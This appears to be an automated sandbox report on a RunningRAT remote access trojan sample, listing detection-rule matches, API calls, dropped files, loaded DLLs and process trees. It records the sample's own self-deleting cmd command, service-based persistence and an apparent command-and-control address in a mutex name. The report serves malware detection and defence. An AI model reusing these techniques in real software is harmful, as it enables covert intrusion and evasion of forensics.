            Source: 0.2.gE4NVCZDRk.exe.4032a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RunningRAT | Author: ditekSHen
            Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Running RAT from Gold Dragon report | Author: Florian Roth
            Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RunningRAT | Author: ditekSHen
            Source: 0.2.gE4NVCZDRk.exe.4032a0.1.unpack, type: UNPACKEDPE | Matched rule: Detects RunningRAT | Author: ditekSHen
            Source: 0.2.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RunningRAT | Author: ditekSHen
            Source: 7.2.SySyeu.exe.10000000.1.unpack, type: UNPACKEDPE | Matched rule: Detects RunningRAT | Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\6011859.dll, type: DROPPED | Matched rule: Detects RunningRAT | Author: ditekSHen
            Source: gE4NVCZDRk.exe | Static PE information: section name: /|wu>
            Source: MyProg.exe.1.dr | Static PE information: section name: Y|uR
            Source: XekSuT.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E15CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError | 7_2_00E15CF1
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E140B1 NtQuerySystemInformation | 7_2_00E140B1
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E15D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose | 7_2_00E15D6A
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E14136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess | 7_2_00E14136
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E15911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxWWorker,CreateActCtxWWorker,GetModuleHandleW,CreateActCtxWWorker,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W | 7_2_00E15911
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_10001F48 strlen,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle | 3_2_10001F48
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_10001FBD LoadLibraryA,GetProcAddress,memset,memset,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,WTSGetActiveConsoleSessionId,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,FreeLibrary | 3_2_10001FBD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_100025A2 ExitWindowsEx | 3_2_100025A2
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Windows\SysWOW64\SySyeu.exe
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\inf\WmiApRpl\
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\inf\WmiApRpl\0009\
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\PerfStringBackup.TMP
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C6076 | 1_2_003C6076
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C6D00 | 1_2_003C6D00
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\6011859.dll CC4AB82995B0C0C827E99870948EF6A1371D4D1ED6D167A087C0D5C123D0F15E
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\XekSuT.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
            Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180
            Source: MyProg.exe.1.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: gE4NVCZDRk.exe, 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename vs gE4NVCZDRk.exe
            Source: gE4NVCZDRk.exe | Binary or memory string: OriginalFilename vs gE4NVCZDRk.exe
            Source: gE4NVCZDRk.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: gE4NVCZDRk.exe, type: SAMPLE | Matched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: gE4NVCZDRk.exe, type: SAMPLE | Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 3.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 0.2.gE4NVCZDRk.exe.4032a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 0.2.gE4NVCZDRk.exe.4032a0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 0.2.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: 7.2.SySyeu.exe.10000000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: C:\Users\user\AppData\Local\Temp\6011859.dll, type: DROPPED | Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
            Source: XekSuT.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: XekSuT.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: XekSuT.exe.0.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: classification engine | Classification label: mal100.spre.bank.troj.evad.winEXE@24/33@1/3
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E13C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy | 7_2_00E13C66
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle | 1_2_003C119F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: OpenSCManagerA,_local_unwind2,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,ChangeServiceConfig2A,ChangeServiceConfig2A,wsprintfA,strlen,StartServiceA | 3_2_10001B5B
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Code function: 0_2_00401794 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcmpiA,CloseHandle,FreeLibrary | 0_2_00401794
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E1205A CoCreateInstance | 7_2_00E1205A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_10001A43 OpenSCManagerA,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,CloseServiceHandle,CloseServiceHandle | 3_2_10001A43
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar
            Source: C:\Windows\SysWOW64\SySyeu.exe | Mutant created: \Sessions\1\BaseNamedObjects\119.91.152.151:8321:SySyeu
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6180
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | File created: C:\Users\user\AppData\Local\Temp\XekSuT.exe
            Source: C:\Windows\SysWOW64\SySyeu.exe | Command line argument: WLDP.DLL | 7_2_00E14136
            Source: C:\Windows\SysWOW64\SySyeu.exe | Command line argument: localserver | 7_2_00E14136
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: gE4NVCZDRk.exe | ReversingLabs: Detection: 97%
            Source: unknown | Process created: C:\Users\user\Desktop\gE4NVCZDRk.exe "C:\Users\user\Desktop\gE4NVCZDRk.exe"
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Process created: C:\Users\user\AppData\Local\Temp\XekSuT.exe C:\Users\user\AppData\Local\Temp\XekSuT.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k "SySyeu"
            Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k "SySyeu"
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\SySyeu.exe C:\Windows\system32\SySyeu.exe "c:\users\user\appdata\local\temp\6011859.dll",MainThread
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
            Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456
            Source: C:\Windows\SysWOW64\WerFault.exe | Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Process created: C:\Users\user\AppData\Local\Temp\XekSuT.exe C:\Users\user\AppData\Local\Temp\XekSuT.exe
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"
            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\SySyeu.exe C:\Windows\system32\SySyeu.exe "c:\users\user\appdata\local\temp\6011859.dll",MainThread
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
            Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180
            Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456
            Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: mfc42.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: ntvdm64.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: ntvdm64.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: ntvdm64.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: ntvdm64.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: ntvdm64.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: devenum.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: winmm.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: devobj.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: msdmo.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: avicap32.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: msvfw32.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: avicap32.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: msvfw32.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\SySyeu.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wersvc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: windowsperformancerecordercontrol.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: weretw.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: faultrep.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dbghelp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dbgcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: loadperf.dll
            Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
            Source: C:\Windows\System32\wbem\WMIADAP.exe | File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb | source: SciTE.exe.1.dr
            Source: Binary string: rundll32.pdb | source: svchost.exe, 00000003.00000003.1684739802.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, SySyeu.exe, SySyeu.exe, 00000007.00000000.1726094464.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, SySyeu.exe.3.dr
            Source: Binary string: rundll32.pdbGCTL | source: svchost.exe, 00000003.00000003.1684739802.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, SySyeu.exe, 00000007.00000000.1726094464.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, SySyeu.exe.3.dr

            Data Obfuscation

            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Unpacked PE file: 1.2.XekSuT.exe.3c0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: SySyeu.exe.3.dr | Static PE information: 0x6A8F1B39 [Wed Aug 26 16:58:33 2026 UTC]
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Code function: 0_2_00401B6B LoadLibraryA,GetProcAddress,__p__pgmptr,sprintf,GetCurrentProcess,SetPriorityClass,GetCurrentThread,SetThreadPriority,ShellExecuteA | 0_2_00401B6B
            Source: initial sample | Static PE information: section where entry point is pointing to: /|wu>
            Source: gE4NVCZDRk.exe | Static PE information: section name: /|wu>
            Source: XekSuT.exe.0.dr | Static PE information: section name: .aspack
            Source: XekSuT.exe.0.dr | Static PE information: section name: .adata
            Source: MyProg.exe.1.dr | Static PE information: section name: PELIB
            Source: MyProg.exe.1.dr | Static PE information: section name: Y|uR
            Source: SciTE.exe.1.dr | Static PE information: section name: u
            Source: Uninstall.exe.1.dr | Static PE information: section name: EpNuZ
